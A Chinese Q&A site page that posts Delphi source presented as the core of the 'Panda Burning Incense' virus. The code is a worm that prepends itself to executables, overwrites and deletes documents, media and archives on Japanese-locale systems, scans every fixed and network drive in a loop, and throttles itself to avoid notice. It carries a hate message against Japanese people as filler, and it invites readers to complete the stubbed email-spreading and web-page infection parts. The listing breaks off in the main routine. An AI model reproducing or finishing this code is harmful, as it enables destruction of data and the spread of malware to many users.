王朝知道
分享
 
 
 

熊猫烧香核心代码,谁来看看?

王朝知道·作者佚名  2012-09-24  
宽屏版  字体: |||超大  
 
分类: 电脑/网络 >> 反病毒
 
问题描述:

代码太长,用另一用户名回答

vb编,具体的我也不知道,但是修改函数值就能变种,只是破坏的方法变下,当然,源文件当然没有,早就让警察没收了,只是和大家分享下

参考答案:

program japussy;

uses

windows, sysutils, classes, graphics, shellapi{, registry};

const

headersize = 82432; //病毒体的大小

iconoffset = $12eb8; //pe文件主图标的偏移量

//在我的delphi5 sp1上面编译得到的大小,其它版本的delphi可能不同

//查找***********的十六进制字符串可以找到主图标的偏移量

{

headersize = 38912; //upx压缩过病毒体的大小

iconoffset = $92bc; //upx压缩过pe文件主图标的偏移量

//upx 1.24w 用法: upx -9 --8086 japussy.exe

}

iconsize = $2e8; //pe文件主图标的大小--744字节

icontail = iconoffset + iconsize; //pe文件主图标的尾部

id = $***********; //感染标记

//垃圾码,以备写入

catchword = 'if a race need to be killed out, it must be yamato. ' +

'if a country need to be destroyed, it must be japan! ' +

'*** w32.japussy.worm.a ***';

{$r *.res}

function registerserviceprocess(dwprocessid, dwtype: integer): integer;

stdcall; external 'kernel32.dll'; //函数声明

var

tmpfile: string;

si: startupinfo;

pi: process_information;

isjap: boolean = false; //日文操作系统标记

{ 判断是否为win9x }

function iswin9x: boolean;

var

ver: tosversioninfo;

begin

result := false;

ver.dwosversioninfosize := sizeof(tosversioninfo);

if not getversionex(ver) then

exit;

if (ver.dwplatformid = ver_platform_win32_windows) then //win9x

result := true;

end;

{ 在流之间复制 }

procedure copystream(src: tstream; sstartpos: integer; dst: tstream;

dstartpos: integer; count: integer);

var

scurpos, dcurpos: integer;

begin

scurpos := src.position;

dcurpos := dst.position;

src.seek(sstartpos, 0);

dst.seek(dstartpos, 0);

dst.copyfrom(src, count);

src.seek(scurpos, 0);

dst.seek(dcurpos, 0);

end;

{ 将宿主文件从已感染的pe文件中分离出来,以备使用 }

procedure extractfile(filename: string);

var

sstream, dstream: tfilestream;

begin

try

sstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);

try

dstream := tfilestream.create(filename, fmcreate);

try

sstream.seek(headersize, 0); //跳过头部的病毒部分

dstream.copyfrom(sstream, sstream.size - headersize);

finally

dstream.free;

end;

finally

sstream.free;

end;

except

end;

end;

{ 填充startupinfo结构 }

procedure fillstartupinfo(var si: startupinfo; state: word);

begin

si.cb := sizeof(si);

si.lpreserved := nil;

si.lpdesktop := nil;

si.lptitle := nil;

si.dwflags := startf_useshowwindow;

si.wshowwindow := state;

si.cbreserved2 := 0;

si.lpreserved2 := nil;

end;

{ 发带毒邮件 }

procedure sendmail;

begin

//哪位仁兄愿意完成之?

end;

{ 感染pe文件 }

procedure infectonefile(filename: string);

var

hdrstream, srcstream: tfilestream;

icostream, dststream: tmemorystream;

iid: longint;

aicon: ticon;

infected, ispe: boolean;

i: integer;

buf: array[0..1] of char;

begin

try //出错则文件正在被使用,退出

if comparetext(filename, 'japussy.exe') = 0 then //是自己则不感染

exit;

infected := false;

ispe := false;

srcstream := tfilestream.create(filename, fmopenread);

try

for i := 0 to $108 do //检查pe文件头

begin

srcstream.seek(i, sofrombeginning);

srcstream.read(buf, 2);

if (buf[0] = #80) and (buf[1] = #69) then //pe标记

begin

ispe := true; //是pe文件

break;

end;

end;

srcstream.seek(-4, sofromend); //检查感染标记

srcstream.read(iid, 4);

if (iid = id) or (srcstream.size < 10240) then //太小的文件不感染

infected := true;

finally

srcstream.free;

end;

if infected or (not ispe) then //如果感染过了或不是pe文件则退出

exit;

icostream := tmemorystream.create;

dststream := tmemorystream.create;

try

aicon := ticon.create;

try

//得到被感染文件的主图标(744字节),存入流

aicon.releasehandle;

aicon.handle := extracticon(hinstance, pchar(filename), 0);

aicon.savetostream(icostream);

finally

aicon.free;

end;

srcstream := tfilestream.create(filename, fmopenread);

//头文件

hdrstream := tfilestream.create(paramstr(0), fmopenread or fmsharedenynone);

try

//写入病毒体主图标之前的数据

copystream(hdrstream, 0, dststream, 0, iconoffset);

//写入目前程序的主图标

copystream(icostream, 22, dststream, iconoffset, iconsize);

//写入病毒体主图标到病毒体尾部之间的数据

copystream(hdrstream, icontail, dststream, icontail, headersize - icontail);

//写入宿主程序

copystream(srcstream, 0, dststream, headersize, srcstream.size);

//写入已感染的标记

dststream.seek(0, 2);

iid := $***********;

dststream.write(iid, 4);

finally

hdrstream.free;

end;

finally

srcstream.free;

icostream.free;

dststream.savetofile(filename); //替换宿主文件

dststream.free;

end;

except;

end;

end;

{ 将目标文件写入垃圾码后删除 }

procedure smashfile(filename: string);

var

filehandle: integer;

i, size, mass, max, len: integer;

begin

try

setfileattributes(pchar(filename), 0); //去掉只读属性

filehandle := fileopen(filename, fmopenwrite); //打开文件

try

size := getfilesize(filehandle, nil); //文件大小

i := 0;

randomize;

max := random(15); //写入垃圾码的随机次数

if max < 5 then

max := 5;

mass := size div max; //每个间隔块的大小

len := length(catchword);

while i < max do

begin

fileseek(filehandle, i * mass, 0); //定位

//写入垃圾码,将文件彻底破坏掉

filewrite(filehandle, catchword, len);

inc(i);

end;

finally

fileclose(filehandle); //关闭文件

end;

deletefile(pchar(filename)); //删除之

except

end;

end;

{ 获得可写的驱动器列表 }

function getdrives: string;

var

disktype: word;

d: char;

str: string;

i: integer;

begin

for i := 0 to 25 do //遍历26个字母

begin

d := chr(i + 65);

str := d + ':\';

disktype := getdrivetype(pchar(str));

//得到本地磁盘和网络盘

if (disktype = drive_fixed) or (disktype = drive_remote) then

result := result + d;

end;

end;

{ 遍历目录,感染和摧毁文件 }

procedure loopfiles(path, mask: string);

var

i, count: integer;

fn, ext: string;

subdir: tstrings;

searchrec: tsearchrec;

msg: tmsg;

function isvaliddir(searchrec: tsearchrec): integer;

begin

if (searchrec.attr <> 16) and (searchrec.name <> '.') and

(searchrec.name <> '..') then

result := 0 //不是目录

else if (searchrec.attr = 16) and (searchrec.name <> '.') and

(searchrec.name <> '..') then

result := 1 //不是根目录

else result := 2; //是根目录

end;

begin

if (findfirst(path + mask, faanyfile, searchrec) = 0) then

begin

repeat

peekmessage(msg, 0, 0, 0, pm_remove); //调整消息队列,避免引起怀疑

if isvaliddir(searchrec) = 0 then

begin

fn := path + searchrec.name;

ext := uppercase(extractfileext(fn));

if (ext = '.exe') or (ext = '.scr') then

begin

infectonefile(fn); //感染可执行文件

end

else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then

begin

//感染html和asp文件,将base64编码后的病毒写入

//感染浏览此网页的所有用户

//哪位大兄弟愿意完成之?

end

else if ext = '.wab' then //outlook地址簿文件

begin

//获取outlook邮件地址

end

else if ext = '.adc' then //foxmail地址自动完成文件

begin

//获取foxmail邮件地址

end

else if ext = 'ind' then //foxmail地址簿文件

begin

//获取foxmail邮件地址

end

else

begin

if isjap then //是倭文操作系统

begin

if (ext = '.doc') or (ext = '.xls') or (ext = '.mdb') or

(ext = '.mp3') or (ext = '.rm') or (ext = '.ra') or

(ext = '.wma') or (ext = '.zip') or (ext = '.rar') or

(ext = '.mpeg') or (ext = '.asf') or (ext = '.jpg') or

(ext = '.jpeg') or (ext = '.gif') or (ext = '.swf') or

(ext = '.pdf') or (ext = '.chm') or (ext = '.avi') then

smashfile(fn); //摧毁文件

end;

end;

end;

//感染或删除一个文件后睡眠200毫秒,避免cpu占用率过高引起怀疑

sleep(200);

until (findnext(searchrec) <> 0);

end;

findclose(searchrec);

subdir := tstringlist.create;

if (findfirst(path + '*.*', fadirectory, searchrec) = 0) then

begin

repeat

if isvaliddir(searchrec) = 1 then

subdir.add(searchrec.name);

until (findnext(searchrec) <> 0);

end;

findclose(searchrec);

count := subdir.count - 1;

for i := 0 to count do

loopfiles(path + subdir.strings + '\', mask);

freeandnil(subdir);

end;

{ 遍历磁盘上所有的文件 }

procedure infectfiles;

var

driverlist: string;

i, len: integer;

begin

if getacp = 932 then //日文操作系统

isjap := true; //去死吧!

driverlist := getdrives; //得到可写的磁盘列表

len := length(driverlist);

while true do //死循环

begin

for i := len downto 1 do //遍历每个磁盘驱动器

loopfiles(driverlist + ':\', '*.*'); //感染之

sendmail; //发带毒邮件

sleep(1000 * 60 * 5); //睡眠5分钟

end;

end;

{ 主程序开始 }

begin

if iswin9x then //是win9x

registerserviceprocess(getcurrentprocessid, 1) //注册为服务进程

else //winnt

begin

//远程线程映射到explorer进程

//哪位兄台愿意完成之?

end;

//如果是原始病毒体自己

if comparetext(extractfilename(paramstr(0)), 'japussy.exe') = 0 then

infectfiles //感染和发邮件

else //已寄生于宿主程序上了,开始工作

begin

tmpfile := paramstr(0); //创建临时文件

delete(tmpfile, length(tmpfile) - 4, 4);

tmpfile := tmpfile + #32 + '.exe'; //真正的宿主文件,多一个空格

extractfile(tmpfile); //分离之

fillstartupinfo(si, sw_showdefault);

createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,

0, nil, '.', si, pi); //创建新进程运行之

infectfiles; //感染和发邮件

小贴士:① 若网友所发内容与教科书相悖,请以教科书为准;② 若网友所发内容与科学常识、官方权威机构相悖,请以后者为准;③ 若网友所发内容不正确或者违背公序良俗,右下举报/纠错。
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
如何用java替换看不见的字符比如零宽空格&#8203;十六进制U+200B
 干货   2023-09-10
网页字号不能单数吗,网页字体大小为什么一般都是偶数
 干货   2023-09-06
java.lang.ArrayIndexOutOfBoundsException: 4096
 干货   2023-09-06
Noto Sans CJK SC字体下载地址
 干货   2023-08-30
window.navigator和navigator的区别是什么?
 干货   2023-08-23
js获取referer、useragent、浏览器语言
 干货   2023-08-23
oscache遇到404时会不会缓存?
 干货   2023-08-23
linux下用rm -rf *删除大量文件太慢怎么解决?
 干货   2023-08-08
刀郎新歌破世界纪录!
 娱乐   2023-08-01
js实现放大缩小页面
 干货   2023-07-31
生成式人工智能服务管理暂行办法
 百态   2023-07-31
英语学习:过去完成时The Past Perfect Tense举例说明
 干货   2023-07-31
Mysql常用sql命令语句整理
 干货   2023-07-30
科学家复活了46000年前的虫子
 探索   2023-07-29
英语学习:过去进行时The Past Continuous Tense举例说明
 干货   2023-07-28
meta name="applicable-device"告知页面适合哪种终端设备:PC端、移动端还是自适应
 干货   2023-07-28
只用css如何实现打字机特效?
 百态   2023-07-15
css怎么实现上下滚动
 干货   2023-06-28
canvas怎么画一个三角形?
 干货   2023-06-28
canvas怎么画一个椭圆形?
 干货   2023-06-28
canvas怎么画一个圆形?
 干货   2023-06-28
canvas怎么画一个正方形?
 干货   2023-06-28
中国河南省郑州市金水区蜘蛛爬虫ip大全
 干货   2023-06-22
javascript简易动态时间代码
 干货   2023-06-20
感谢员工的付出和激励的话怎么说?
 干货   2023-06-18
 
>>返回首页<<
 
 
 
静静地坐在废墟上,四周的荒凉一望无际,忽然觉得,凄凉也很美
© 2005- 王朝网络 版权所有